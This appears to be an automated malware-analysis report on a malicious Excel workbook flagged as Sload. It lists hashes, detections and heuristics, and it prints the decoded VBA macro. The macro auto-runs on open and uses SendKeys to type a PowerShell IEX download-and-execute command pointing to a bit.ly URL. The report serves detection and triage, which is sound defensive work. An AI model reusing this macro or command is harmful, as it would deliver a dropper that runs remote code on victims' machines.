Office (OOXML) malware analysis — malicious · 2b848d3a39bc6f0d

MALICIOUS

Office (OOXML)

11.7 KB Created: 2021-04-14 19:18:36 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-04-25

MD5: 1791c8a38e3c4dd0d4bc03db9aa37485 SHA-1: f8b36436809b0115cd700f6098fcc4665095d329 SHA-256: 2b848d3a39bc6f0d4685d0d6de76579d6c5c5cd67edfb6d5d60654aa2d6f6396

270 Risk Score

Heuristics 6

ClamAV: Xls.Malware.Sload-7135989-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Sload-7135989-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

hhteuuva = "powerShell -NoExit -command ""IEX {(}New-Object Net.WebClient{)}.DownloadString{(}'https://bit.ly/2QndWbp"

VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER

The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
Matched line in script
```
Private Sub Workbook_Open()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://bit.ly/2QndWbp In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1400 bytes
SHA-256: `ff075053cafb16717226a4f7733f0a95b4a6c520ae75863354f66892ad83b2c5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() On Error Resume Next Application.SendKeys fnvcfanljtbk("5e") & fnvcfanljtbk("7b6573637d") Application.Wait (Now() + TimeValue(fnvcfanljtbk("30") & fnvcfanljtbk("303a30303a3031"))) Dim hhteuuva As String hhteuuva = "powerShell -NoExit -command ""IEX {(}New-Object Net.WebClient{)}.DownloadString{(}'https://bit.ly/2QndWbp" Application.SendKeys hhteuuva Application.Wait (Now() + TimeValue(fnvcfanljtbk("30303a3030") & fnvcfanljtbk("3a3033"))) Application.SendKeys fnvcfanljtbk("7e") End Sub Private Function fnvcfanljtbk(ByVal pseqwoxsqqky As String) As String Dim rxrqhakounqm As Long For rxrqhakounqm = 1 To Len(pseqwoxsqqky) Step 2 fnvcfanljtbk = fnvcfanljtbk & Chr$(Val("&H" & Mid$(pseqwoxsqqky, rxrqhakounqm, 2))) Next rxrqhakounqm End Function Attribute VB_Name = "Blad1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	10240 bytes
SHA-256: `8dd8d9710fbd2b10a6c98f928aaa9a9c13c985a037831b24fc7ed90bcd48e11b`
Detection ClamAV: Xls.Malware.Sload-7135989-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.